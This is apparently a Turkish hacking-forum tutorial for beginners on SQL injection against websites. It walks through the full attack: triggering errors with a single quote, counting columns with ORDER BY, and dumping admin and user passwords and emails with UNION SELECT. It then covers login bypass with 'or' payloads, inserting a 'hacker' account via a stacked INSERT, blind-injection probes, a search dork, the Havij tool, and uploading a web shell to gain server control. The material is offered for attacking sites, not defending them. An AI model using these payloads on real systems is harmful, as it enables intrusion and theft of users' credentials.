öncelikle açık tarama programlarını bir kenara atın.
bu noktada bir çok sorumuz olacak
sql açığı nedir
sql kritik bir açıktır gizli kalması gereken bilgilere ulaşılması anlamınada gelmektedir.kullanıcı bilgileri gibi örnek verecek olursak admin şifresi
peki ya açığı nasıl bulucaz
sql açığını genelde ’a ile buluruz örnek vereyim hemen
www.site54.com’apeki bu tek tırnak ne işe yarıyor onuda anlatayım.kafamızda soru kalmasın
sql de amaç hata verdirmektir bizde bu tek tırnak işaretimizle hatayı verdiriyoruz.
aşağıdaki gibi bir hata örneğin siz daha kapsamlı araştırın tavsiyem security tv bölümüdür ordaki videoları izleyin
peki hatayı verdirdik sonra ne yapıyoruz.
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed
quotation mark before the character string "",
databank/login.asp,line 5
kolon sayısını bulmamız gerekmektedir.
nasılmı
order+by+kolon sayısı deneme yanılma ile sql kolon sayısı 11 olsun
şu şekilde devam ediyoruz...
union+select+,1,2,3,4,5,6,7,8,9,10,11+from+admin veya users veya member bu siteye göre değişir admin olsun.farkettiyseniz 11 dahil değil çünkü 0 da var.
admin password ve kullanıcı adı ekrana vurdu diyelim.
union+select+,1,2,password,4,admin,6,7,8,9,10,11+f rom+admin
görüldüğü gibi password ve admin şifresi elimizde ilk üyeyi çekmek için
top+1 kullanıyoruz.örnekle daha iyi anlayacaksınız..
http://www.site54.com/new/admin.asp?...11+from+memberselecten sonra top+1 yazıyoruz.
şimdi arkadaşlar bu ilk üyeyi çekmemize yarar.sadece admini değil diğer kullanıcılarında şifrelerine ulaştığınızı varsayın.
email çekelim birde
8 yerine email yazıyoruz.
peki arkadaşlar buraya kadar herşey tamam bittimi sadece urldenmi saldırabiliyoruz. hayırrr
devamı var sıkıldınızmı okumaya devam yeni başlayanlar
arkadaşlar where+like+select komutuna girmiyorum kafanız karışmasın .
kullanıcıların veri girişi yaptıkları yer yani web formlarındanda saldırabiliriz.
örnek vereyim bunada bir tane
kullanıcı adı:’or’
şifre:’or’
bir diğer adı kimlik doğrulayarak geçmek.
bunun dorkunuda vereyim
’or’+uname
evet arkadaşlar mysql mssql bunlara girmiyorum siz kapsamlı araştırın.birde şunu bilin mysql ve mssql dede kolon sayısını aynı şekilde buluyorsunuz.. forumda yeterli döküman mevcuttur tavsiyem el_muhammed ve the_mıller
sql enjeksiyon ile veritabanına yazı yazmayı göstereyim birde konuyu bitireyim.
having komutu ile veritabanı veritabanı üzerinde tablo ve kolon isimlerini öğrenen saldırgan bundan sonraki aşamada veritabanına kayıt eklemeye çalışacaktır.bu noktada ise insert komutu ile veri kaydedebilir.
örnek:
kullanıcı adı:’;insert into userinfo values (hacker’,’hacker’);--
şifre:’;insert into userinfo values (hacker’,’hacker’);--
yukarıda verdiğim komut veritabanı üzerinde bulunan userinfo adlı tabloya hacker isimli kullanıcı adı ve hacker isimli bir şifre ekleyebilir.birde blind sql den hacked yapanların kulakları çınlasın.
blind sql de sayfada hata vermemektedir arkadaşlar bunu bilin.
and+1=1
and+1=0
ile sayfa değişmektedir sadece... bu da sql olduğu anlamına gelir videoları izlerseniz daha iyi anlayacaksınız.
inşAllah yakında bunlar hakkında videoda çekeceğim ama konumuz bu değil size şimdilik havij programından basedecem.kafanızda soru kalmasın.birazda shell den bahsedeğim sql ile shelli arkadaşlar admin yerine giriş yaptıktan sonra upload yerini bulmanız gerekmektedir.ve shelli çaktıktan shell yolumuzu yazar adrese gireriz.bu şekilde serverda root oluruz veya olmayız bu size kalmış.
Havij programını size resimli olarak anlatırsam aklınız biraz karışabilir en iyisi videolu anlatarak hem resimli hem sesli daha iyi anlarsınız
.jpg)
